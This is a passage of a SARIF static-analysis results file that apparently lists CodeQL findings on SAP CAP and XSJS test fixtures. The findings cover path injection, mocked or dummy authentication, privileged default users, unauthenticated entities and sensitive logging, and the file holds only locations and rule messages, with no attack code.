operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":40,"startColumn":26,"endColumn":35}}}],"partialFingerprints":{"primaryLocationLineHash":"9efda1281fa0866d:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":40,"startColumn":26,"endColumn":35}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":41,"startColumn":26,"endColumn":35}}}],"partialFingerprints":{"primaryLocationLineHash":"66f493d838c437b1:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":41,"startColumn":26,"endColumn":35}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":43,"startColumn":25,"endColumn":34}}}],"partialFingerprints":{"primaryLocationLineHash":"8f73a0930e234a4e:1","primaryLocationStartColumnFingerprint":"12"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":43,"startColumn":25,"endColumn":34}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":44,"startColumn":25,"endColumn":34}}}],"partialFingerprints":{"primaryLocationLineHash":"d6c22993642b7f91:1","primaryLocationStartColumnFingerprint":"12"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":44,"startColumn":25,"endColumn":34}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":46,"startColumn":26,"endColumn":35}}}],"partialFingerprints":{"primaryLocationLineHash":"a8a6e2d6350921ee:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":46,"startColumn":26,"endColumn":35}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":47,"startColumn":26,"endColumn":35}}}],"partialFingerprints":{"primaryLocationLineHash":"434bdd8f18e7c7d:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":47,"startColumn":26,"endColumn":35}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":49,"startColumn":22,"endColumn":31}}}],"partialFingerprints":{"primaryLocationLineHash":"8ecbfdc82d65a76d:1","primaryLocationStartColumnFingerprint":"9"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":49,"startColumn":22,"endColumn":31}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":50,"startColumn":22,"endColumn":31}}}],"partialFingerprints":{"primaryLocationLineHash":"62c405a97e577740:1","primaryLocationStartColumnFingerprint":"9"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":50,"startColumn":22,"endColumn":31}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-non-prod-auth-strategy","rule":{"id":"js/cap-non-prod-auth-strategy","index":3,"toolComponent":{"index":8}},"message":{"text":"Current authentication strategy contains [credentials of mocked users](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json","uriBaseId":"%SRCROOT%","index":159},"region":{"startLine":17,"startColumn":18,"endLine":32,"endColumn":10}}}],"partialFingerprints":{"primaryLocationLineHash":"189356aa691178ee:1","primaryLocationStartColumnFingerprint":"9"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json","uriBaseId":"%SRCROOT%","index":159},"region":{"startLine":17,"startColumn":18,"endLine":32,"endColumn":10}},"message":{"text":"credentials of mocked users"}}]},{"ruleId":"js/cap-non-prod-auth-strategy","rule":{"id":"js/cap-non-prod-auth-strategy","index":3,"toolComponent":{"index":8}},"message":{"text":"Non-production authentication strategy [basic](1) is used."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json","uriBaseId":"%SRCROOT%","index":159},"region":{"startLine":16,"startColumn":17,"endColumn":24}}}],"partialFingerprints":{"primaryLocationLineHash":"8ec70b5c261c793b:1","primaryLocationStartColumnFingerprint":"8"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json","uriBaseId":"%SRCROOT%","index":159},"region":{"startLine":16,"startColumn":17,"endColumn":24}},"message":{"text":"basic"}}]},{"ruleId":"js/cap-non-prod-auth-strategy","rule":{"id":"js/cap-non-prod-auth-strategy","index":3,"toolComponent":{"index":8}},"message":{"text":"Non-production authentication strategy [dummy](1) is used."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json","uriBaseId":"%SRCROOT%","index":167},"region":{"startLine":15,"startColumn":15,"endColumn":22}}}],"partialFingerprints":{"primaryLocationLineHash":"2a27bf058be4572:1","primaryLocationStartColumnFingerprint":"8"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json","uriBaseId":"%SRCROOT%","index":167},"region":{"startLine":15,"startColumn":15,"endColumn":22}},"message":{"text":"dummy"}}]},{"ruleId":"js/cap-non-prod-auth-strategy","rule":{"id":"js/cap-non-prod-auth-strategy","index":3,"toolComponent":{"index":8}},"message":{"text":"Non-production authentication strategy [mocked](1) is used."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json","uriBaseId":"%SRCROOT%","index":174},"region":{"startLine":21,"startColumn":15,"endColumn":23}}}],"partialFingerprints":{"primaryLocationLineHash":"2af5230c91e6a4cd:1","primaryLocationStartColumnFingerprint":"8"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json","uriBaseId":"%SRCROOT%","index":174},"region":{"startLine":21,"startColumn":15,"endColumn":23}},"message":{"text":"mocked"}}]},{"ruleId":"js/cap-default-user-is-privileged","rule":{"id":"js/cap-default-user-is-privileged","index":4,"toolComponent":{"index":8}},"message":{"text":"The default user is being overridden to a privileged user."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js","uriBaseId":"%SRCROOT%","index":142},"region":{"startLine":8,"endColumn":37}}}],"partialFingerprints":{"primaryLocationLineHash":"b6ec748aef5ccec4:1","primaryLocationStartColumnFingerprint":"0"}},{"ruleId":"js/cap-default-user-is-privileged","rule":{"id":"js/cap-default-user-is-privileged","index":4,"toolComponent":{"index":8}},"message":{"text":"The default user is being overridden to a privileged user."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js","uriBaseId":"%SRCROOT%","index":146},"region":{"startLine":12,"startColumn":5,"endColumn":41}}}],"partialFingerprints":{"primaryLocationLineHash":"ee143e9aad9c9a16:1","primaryLocationStartColumnFingerprint":"0"}},{"ruleId":"js/cap-default-user-is-privileged","rule":{"id":"js/cap-default-user-is-privileged","index":4,"toolComponent":{"index":8}},"message":{"text":"The default user is being overridden to a privileged user."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js","uriBaseId":"%SRCROOT%","index":144},"region":{"startLine":14,"startColumn":7,"endColumn":43}}}],"partialFingerprints":{"primaryLocationLineHash":"2c0c554bf5b5f7d:1","primaryLocationStartColumnFingerprint":"0"}},{"ruleId":"js/cap-unnecessarily-granted-privileged-access-rights","rule":{"id":"js/cap-unnecessarily-granted-privileged-access-rights","index":5,"toolComponent":{"index":8}},"message":{"text":"This entity is accessed with unnecessarily privileged rights that requires authorization."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.js","uriBaseId":"%SRCROOT%","index":156},"region":{"startLine":18,"startColumn":21,"endColumn":38}}}],"partialFingerprints":{"primaryLocationLineHash":"383e73b4014710f9:1","primaryLocationStartColumnFingerprint":"12"}},{"ruleId":"js/cap-unnecessarily-granted-privileged-access-rights","rule":{"id":"js/cap-unnecessarily-granted-privileged-access-rights","index":5,"toolComponent":{"index":8}},"message":{"text":"This entity is accessed with unnecessarily privileged rights that requires authorization."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.js","uriBaseId":"%SRCROOT%","index":156},"region":{"startLine":35,"startColumn":21,"endColumn":38}}}],"partialFingerprints":{"primaryLocationLineHash":"383e73b4014710f9:2","primaryLocationStartColumnFingerprint":"12"}},{"ruleId":"js/cap-unnecessarily-granted-privileged-access-rights","rule":{"id":"js/cap-unnecessarily-granted-privileged-access-rights","index":5,"toolComponent":{"index":8}},"message":{"text":"This entity is accessed with unnecessarily privileged rights that requires authorization."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.js","uriBaseId":"%SRCROOT%","index":154},"region":{"startLine":18,"startColumn":24,"endColumn":50}}}],"partialFingerprints":{"primaryLocationLineHash":"62915c8622048073:1","primaryLocationStartColumnFingerprint":"11"}},{"ruleId":"js/cap-unnecessarily-granted-privileged-access-rights","rule":{"id":"js/cap-unnecessarily-granted-privileged-access-rights","index":5,"toolComponent":{"index":8}},"message":{"text":"This entity is accessed with unnecessarily privileged rights that requires authorization."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.js","uriBaseId":"%SRCROOT%","index":154},"region":{"startLine":33,"startColumn":24,"endColumn":50}}}],"partialFingerprints":{"primaryLocationLineHash":"8c5c989d244a1f09:1","primaryLocationStartColumnFingerprint":"11"}},{"ruleId":"js/cap-unnecessarily-granted-privileged-access-rights","rule":{"id":"js/cap-unnecessarily-granted-privileged-access-rights","index":5,"toolComponent":{"index":8}},"message":{"text":"This entity is accessed with unnecessarily privileged rights that requires authorization."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.js","uriBaseId":"%SRCROOT%","index":154},"region":{"startLine":50,"startColumn":25,"endColumn":40}}}],"partialFingerprints":{"primaryLocationLineHash":"faab9436420ec8fd:1","primaryLocationStartColumnFingerprint":"12"}},{"ruleId":"js/cap-unnecessarily-granted-privileged-access-rights","rule":{"id":"js/cap-unnecessarily-granted-privileged-access-rights","index":5,"toolComponent":{"index":8}},"message":{"text":"This entity is accessed with unnecessarily privileged rights that requires authorization."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.js","uriBaseId":"%SRCROOT%","index":154},"region":{"startLine":67,"startColumn":25,"endColumn":40}}}],"partialFingerprints":{"primaryLocationLineHash":"8eb12b95cf4128eb:1","primaryLocationStartColumnFingerprint":"12"}},{"ruleId":"js/cap-unnecessarily-granted-privileged-access-rights","rule":{"id":"js/cap-unnecessarily-granted-privileged-access-rights","index":5,"toolComponent":{"index":8}},"message":{"text":"This entity is accessed with unnecessarily privileged rights that may require authorization."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.js","uriBaseId":"%SRCROOT%","index":154},"region":{"startLine":83,"startColumn":24,"endColumn":38}}}],"partialFingerprints":{"primaryLocationLineHash":"9343d25bdd5ba748:1","primaryLocationStartColumnFingerprint":"11"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS entity `Service1.Service1Entity1` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds","uriBaseId":"%SRCROOT%","index":153},"region":{"startLine":6,"startColumn":10,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"3984db8d11cdcda4:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS action `Service1.send2` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds","uriBaseId":"%SRCROOT%","index":153},"region":{"startLine":18,"startColumn":10,"endColumn":15}}}],"partialFingerprints":{"primaryLocationLineHash":"28b66b32406f07ba:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS action `Service1.send3` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds","uriBaseId":"%SRCROOT%","index":153},"region":{"startLine":23,"startColumn":10,"endColumn":15}}}],"partialFingerprints":{"primaryLocationLineHash":"a5382f0f9fda534:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS action `Service1.send4` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds","uriBaseId":"%SRCROOT%","index":153},"region":{"startLine":28,"startColumn":10,"endColumn":15}}}],"partialFingerprints":{"primaryLocationLineHash":"ebf09aafb38c42ae:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS action `Service1.send5` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds","uriBaseId":"%SRCROOT%","index":153},"region":{"startLine":33,"startColumn":10,"endColumn":15}}}],"partialFingerprints":{"primaryLocationLineHash":"65cd9b8a9955401b:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS entity `Service2.Service2Entity1` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.cds","uriBaseId":"%SRCROOT%","index":155},"region":{"startLine":6,"startColumn":10,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"b02237ac8be3c990:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS action `Service2.send1` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.cds","uriBaseId":"%SRCROOT%","index":155},"region":{"startLine":13,"startColumn":10,"endColumn":15}}}],"partialFingerprints":{"primaryLocationLineHash":"d2bdf8ef231dddd1:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS service `Service` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.cds","uriBaseId":"%SRCROOT%","index":199},"region":{"startLine":3,"startColumn":9,"endColumn":16}}}],"partialFingerprints":{"primaryLocationLineHash":"a2294454385cb916:1","primaryLocationStartColumnFingerprint":"8"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS entity `Service.ServiceEntity` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.cds","uriBaseId":"%SRCROOT%","index":199},"region":{"startLine":5,"startColumn":10,"endColumn":23}}}],"partialFingerprints":{"primaryLocationLineHash":"d5a18811944e0c6:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS action `Service.send` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.cds","uriBaseId":"%SRCROOT%","index":199},"region":{"startLine":8,"startColumn":10,"endColumn":14}}}],"partialFingerprints":{"primaryLocationLineHash":"e6b459744cc3d70d:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-sensitive-log","rule":{"id":"js/cap-sensitive-log","index":7,"toolComponent":{"index":8}},"message":{"text":"Log entry depends on the [name](1) field which is annotated as potentially sensitive."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.js","uriBaseId":"%SRCROOT%","index":238},"region":{"startLine":9,"startColumn":32,"endColumn":43}}}],"partialFingerprints":{"primaryLocationLineHash":"c2d27f652a20308e:1","primaryLocationStartColumnFingerprint":"23"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.cds","uriBaseId":"%SRCROOT%","index":237},"region":{"startLine":4,"startColumn":5,"endColumn":9}},"message":{"text":"name"}}]},{"ruleId":"js/xsjs-broken-authentication","rule":{"id":"js/xsjs-broken-authentication","index":0,"toolComponent":{"index":9}},"message":{"text":"Authentication should not be disabled."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/exposed/.xsaccess","uriBaseId":"%SRCROOT%","index":637},"region":{"startLine":3,"startColumn":23,"endColumn":27}}}],"partialFingerprints":{"primaryLocationLineHash":"a900cae7399fb257:1","primaryLocationStartColumnFingerprint":"18"}},{"ruleId":"js/xsjs-broken-authentication","rule":{"id":"js/xsjs-broken-authentication","index":0,"toolComponent":{"index":9}},"message":{"text":"Authentication is missing from the configuration."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/missing_auth/.xsaccess","uriBaseId":"%SRCROOT%","index":638},"region":{"startLine":1,"endLine":4,"endColumn":2}}}],"partialFingerprints":{"primaryLocationLineHash":"b57c6bae252883be:1","primaryLocationStartColumnFingerprint":"0"}},{"ruleId":"js/xsjs-broken-authentication","rule":{"id":"js/xsjs-broken-authentication","index":0,"toolComponent":{"index":9}},"message":{"text":"Authentication should not be 